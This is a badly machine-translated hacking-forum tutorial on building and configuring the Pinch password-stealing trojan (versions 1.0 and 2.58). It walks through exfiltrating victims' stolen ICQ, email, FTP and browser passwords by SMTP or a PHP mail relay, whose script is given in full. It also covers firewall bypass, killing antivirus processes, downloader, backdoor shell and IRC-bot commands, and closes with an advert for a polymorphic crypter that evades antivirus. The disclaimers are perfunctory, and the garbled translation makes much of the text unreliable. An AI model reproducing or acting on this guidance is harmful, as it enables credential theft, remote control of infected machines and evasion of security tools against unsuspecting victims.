Briser le savon yuzaem BrutusAET2


Le matériel est affiché à titre d' information. L'auteur assume aucune OTVETSVTENNOSTI


-------------------------------------------------- ----------------
partie 1. Le vieux, mais utile. 1 pincée

***********************
1.0 Instructions pour Pincée
***********************

=====
Intro
=====

S'il vous plaît ne soyez pas surpris que je décidé d'écrire un article similaire (article pour lamerzzz). Le fait est que sur mon forum (http://forum.web-hack.ru) environ une fois tous les trois jours, créé un sujet comme "Comment configurer et utiliser Pincez?", "Comment utiliser Pinch`em?" etc.

===========
opportunités
===========

Ce cheval de Troie est assez répandue en 2003/2004. Tout cela grâce à la possibilité de voler un grand nombre de mots de passe (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ et AIM, & RQ, The Bat!, The Bat! 2, Outlook / Outlook Express, IE autocomplete & sites & ftp protégées (9x / ME / 2000 / XP), FAR Manager (ftp), Win / total Commander (ftp), RAS (9x / Me / 2k / xp prise en charge)), un faible poids, open source et facile de créer un cheval de Troie pour la tâche spécifique. Trojan a les caractéristiques suivantes:

- Envoyer la configuration de l'ordinateur de la victime: OS, Operatika, CPU, disque dur, utilisateur connecté, le nom d'hôte, IP
- Clavier Spy (Key-log)
- Remote Console (console à distance)
- Bypass Firewall`a
- Envoi du mot de passe par E-mail en utilisant serveur SMTP
- Cryptage des mots de passe volés envoyé par courrier
- Auto Supprimer Trojan après le lancement
- HTML / Rapports de texte
- Taille du fichier environ 10Kb
- Système modulaire
- Et bien plus encore ...

écriture Troyan coban2k (http://www.cobans.net) - assez personne bien connue dans le monde ICQ-piratage. En raison de problèmes avec hébergement sur le magasin de Troie sur leur serveur, l'auteur a été contraint de retirer cette créature de votre propre site. Malheureusement presque tous les antivirus trouvent cela un triple et il ne peut vparit victime, qui ne soit pas un antivirus.

============
Composants
============

Archive (pinch_1.0.zip) avec trojan contient les dossiers et fichiers suivants:

\ PinchBuilder.exe - assistant pour créer un cheval de Troie
\ Parser.exe - programme pour décrypter les messages codés avec des mots de passe
\ Readme.txt - aucun commentaire
\ Pincée \ - le dossier principal avec le compilateur asm-source et Trojan
\ Sources \ - l'autre source
\ TB 2 Plugin (Auto-parser) \ -! Dossier avec plug-in pour The Bat 2, qui décode les e-mails cryptés avec des mots de passe qui viennent à votre boîte aux lettres
\ Sources \ Script \ - script PHP, qui est envoyé par un mot de passe lors de la sélection de l'option appropriée lors de la compilation (lire la suite)

================
Compiler Troy
================

L'ensemble est livré avec un assistant spécial (PinchBuilder.exe), qui est engagé dans la création et cheval de Troie de vos besoins et de la compilation du droit de Troie sur votre ordinateur. Le programme comporte deux onglets principaux: Compiler et Décrypter. La première est de créer un cheval de Troie, et l'autre pour décrypter les mots de passe (en fait, cet onglet est le résultat du travail fichier Parser.exe). En outre, il y a trois sous-onglets: SMTP, HTTP, et FILE. Ils sont donnés un mot de passe l'option O. Nous examinons tous les détails:

========
SMTP
========

Dans le champ Serveur, entrez l'adresse (hostname / ip) serveur SMTP. Si vous avez entré le nom de domaine du serveur, cliquez sur le Resolve, que le domaine du serveur a pris la forme d'adresses IP. En outre, dans les champs De et souligner le savon. Envoyer bouton de massage de test est utilisé pour tester l'envoi d'une lettre par les paramètres que vous spécifiez. Nous vous recommandons fortement de l'utiliser. Si la lettre ne vient pas, cela signifie qu'il ya des problèmes avec l'envoi (pare-feu inclus, mauvais SMTP, ne pas appuyer sur la Resolve, etc.).

Je note que, récemment, la majorité des fournisseurs se déplacent à un système sur lequel leurs clients peuvent envoyer des lettres seulement avec leur SMTP-Verver. Dans de tels cas, il est recommandé d'utiliser une méthode d'envoi de messages via HTTP.

====
HTTP
====

Télécharger des fichiers \ Sources \ Script \ view.php le serveur prend en charge les scripts PHP et exécuter la fonction mail (). En outre, dans le champ URL, indiquez le chemin d'accès à ce script (par exemple, http://www.xss.ru/pinch.php). Dans le champ Objet, indiquez le nom du thème, qui va récupérer la lettre. Dans le champ Etat contrôle str doit être une chaîne, qui est délivré par le script après le téléchargement. Le script est venu avec Troy il importe: _ret_ok_1:

<Language Script = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>

Si cette valeur est acceptée trojan, il va essayer d'envoyer un e-mail par le biais de ce script chaque minute, jusqu'à ce qu'il reçoive une réponse à une chaîne du champ Contrôle de l'état str. Je vous recommande d'utiliser un script ne fait pas partie de la norme, et je l'ai écrit:

<Html> <body>
<? Php
// Auteur: Terabyte (http://www.web-hack.ru)
$ Email = $ _ POST [ 'a'];
$ Subject = $ _ POST [ 'b'];
$ Msg = $ _ POST [ 'c'];
if (isset ($ email) et isset ($ subject) et isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Language Script = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

Il fait presque la même chose, mais plus intelligemment écrit. Le grand avantage d'utiliser cette méthode d'envoi des mots de passe est le fait qu'il vous permet d'envoyer des mots de passe pour contourner Firewall`a. Comment y parvenir? Voici une coupure du outpost`a journal au moment de l'envoi du mot de passe via un script sur mon site:

Nom du processus: iexplorer.exe
Protocoles: HTTP
Adresse à distance: www.web-hack.ru

Je pense que tout le monde compris qui ne sont pas dans le réservoir =) Juste des avantages que je peut je peux donner l'occasion d'enregistrer le courrier chiffré sur votre site, et ne pas envoyer au savon; possibilité de changer le savon sur lequel les mots de passe sont envoyés au cas où il va supprimer; avec la distribution de masse de Troie (que les mots de passe peuvent être envoyés même à ces fournisseurs de services, qui est désactivé l'accès à tous les serveurs SMTP, mais leur it)

====
FILE
====

Sur cet onglet, spécifiez le chemin vers le fichier où vous avez enregistré tous les mots de passe. Pour ce faire, dans le champ Chemin, nous avons besoin d'écrire le chemin d'accès au fichier (par exemple, C: \ password.txt).

================
Options du compilateur
================

Dans ce domaine, tout est clair, alors il vous suffit de mettre une croix dans les domaines où vous en avez besoin. Il est intéressant de noter Ajouter champ Icône. Il spécifie le chemin d'accès à l'icône qui permet d'afficher le cheval de Troie compilé. Je remarque que sur mon système (Windows XP) Je n'ai pas été en mesure de compiler Troy avec cette option activée, et il a dû être désactivé.

Le champ Protocole indique la méthode des mots de passe à envoyer (SMTP / HTTP / FILE). Ensuite, cliquez sur le bouton Compiler pour compiler et devrait Trojan, qui restera dans le dossier principal avec l'assistant pour créer.

===================
mot de passe de décryptage
===================

Disons que vous avez réussi à tripler le lamer de vparit et vous êtes venus les mots de passe de savon de la machine victime. Le fait est que lors de l'envoi des mots de passe cryptés et de commencer à déchiffrer (si vous ne disposez pas d'un plug-in spécial pour TheBat! Décrit ci-dessus). Copier du texte dans le presse-papiers avec des mots de passe codés, ouvert Parser.exe (ou Décrypter onglet PinchBuilder.exe) et cliquez dans les paragraphes des données de processus de menu contextuel (ou appuyez simplement sur le raccourci clavier Alt + C). Ensuite, le programme vous donnera toutes les données volées à la victime d'une manière commode. Ensuite, vous pouvez enregistrer ou imprimer.

==========
conclusion
==========

Je tiens à vous avertir que l'utilisation de ce cheval de Troie une fois que vous tombez sous l'article 273 du Code criminel et peut être sévèrement puni ;-) Je (l'auteur) ne portent aucune responsabilité pour tout dommage qui pourrait être causé à une personne ou, après avoir lu mon article.


----------------------------------------

partie 2. L'instruction pincer 2,58

Un petit petit article sur le réglage du pincement élémentaire. Ne jugez pas strictement, mais critiquer toute la bouche. Article sur le réglage Pincez 2.58.

Je pense que les fissures om niukavo pas de problèmes, car il y a une aide détaillée, et même une vidéo ci-jointe. Je veux montrer comment configurer Bildere Troy:

Propriétés SMTP
Server (vous entrez dans votre cas smtp.mail.ru), alors assurez-vous de pousser Resolve qu'il transforme en IP (par la manière. Toutes les manipulations doivent être effectuées lors de la connexion à Internet)

Port - laisser tel quel,

Protocole - une sélection sera préparé un rapport sur le SMTP, HTTP (via php) et FILE - stockés sur votre ordinateur. Boutons avec le même nom (SMTP, HTTP, FILE) fixant des protocoles, mais nous nous intéressons dans ce cas SMTP et nous avons déjà mis en place ..

bouton TestSend envoyer un message de test à l'e - mail.

Tab PWD - mots de passe préter des programmes suivants. Point ENABLE PWD lors de la suppression des rapports de choucas ne contiendront pas les mots de passe.
Galka Ne pas envoyer ancien rapport - pas envoyer les anciens rapports.
Choucas Crypter et emballage interreliés. FSG, UPX, MEW méthode d'emballage de sélection.

Tab RUN - choix des méthodes de démarrage. Je traiterai en elle. Zapuchkat comme .... standart, DLL, service Undelate. Déplacer vers un dossier ou se les points ..... ou choisir l'un des systèmes. Droite Valeurs colonne Je ne suis pas le toucher et pour être honnête vaguement imaginer ce qu'il est. En bas à droite - bypass Pare-feu Windows (SP2) - contournement du pare-feu du système dans SP2 (pour autant que je sais que le mécanisme de ce point - il a commencé comme iexplorer.exe)

L'onglet SPY - ce qui est des rapports supplémentaires - je l' ai fonctionne pas. espion écran Fad - une capture d'écran, mais encore une fois, je ne fonctionne pas (srkin envoie, mais il était vide)

Tab NET - je ne l' utilise pas. Il est conçu pour:
1. Ouvrez un port sur l'ordinateur infecté, et ainsi y avoir accès (fortement Nesovetuyu l'utiliser, sinon zashifrueshsya si vous êtes pris, alors il peut deviner ce qui va venir ...)
2. Downloader - un lien direct vers un fichier qui est de télécharger et d'exécuter (compter jusqu'à ce que les dépenses porteront votre ennemi s'il a le trafic ......))))
3. AutoUpdate - Mise à jour automatique - Troy, à la fin des travaux, télécharger votre copie, puis supprime lui-même et le prochain démarrage du système, démarre ont une nouvelle copie (qui, pour une plus grande fiabilité qui ne serait pas trouvé ..

Tab BD (backdoor) - console shell ouvre sur la gestion du port sélectionné via telnet (telnet.exe) ou prog alternative. (Je ne l'ai pas essayé)

Tab ECT - la liaison avec tous les fichiers, ainsi que l'installation d'icônes ... Vous pouvez faire qui affiche un message ... Mais quelque chose ne fonctionne pas ...

Tab KILL - Tuez kokogo un processus (vous pouvez essayer de tuer anti-virus), tels que "spidernt" - et puis arrêtez et drweb-moniteur (je vous préviens, je ne l' ai pas donné, mais je vais essayer)

Tab IE - installé sur leur page de démarrage du navigateur. Ajout de pages aux favoris ....

Tab WORM - sho tse Takeo, je ne veduyu ... .....

onglet IRC-bot - L' accès à un ordinateur via IRC:
autorisation .login
.die - achèvement bot
.Téléchargement - saut à déposer Urla
.httpd - libre accès au fichier via http à un port spécifique
.killthread - la réalisation d'une tâche spécifique
.proxy - ouverture soks4 avec le port sélectionné avec l'id sélectionnée
.raw - envoi de texte brut sur le serveur irc
.remove - samoudalenie
.restart - Restart
.run - exécuter la commande
.scan - adresses IP balayage pour certains ports ouverts
.shell - l'ouverture de la coque à un certain port (pas 95/98 / ME)
.status - show version, IP, date de lancement
.threads - montrer les tâches actives
.update - bot avec un auto-renouvellement spécial Urla
.Visite - visitez l'URL sélectionnée est cachée
.url - visitez l'URL sélectionnée ouvert
.link - ajouter à favorits
.sp - Faites votre page d'accueil
.msg - message (messagebox)

Cela semble être tout .... Vous appuyez sur COMPILE et vous avez un dossier avec un triple Builder apparaît ...

BONNE CHANCE !!!!!

PS Ceci est, comme, tout est écrit pour l'information et auteur décline toute responsabilité pour les conséquences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Caractéristiques de la crypte:
Occasion polimorny kriptor
Bypass KIS et Outpost (y compris la dernière version)
Samoudalenie
Réduction de la taille (pincement normale réduite par 3-6kb, chargeur zupacha sur 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~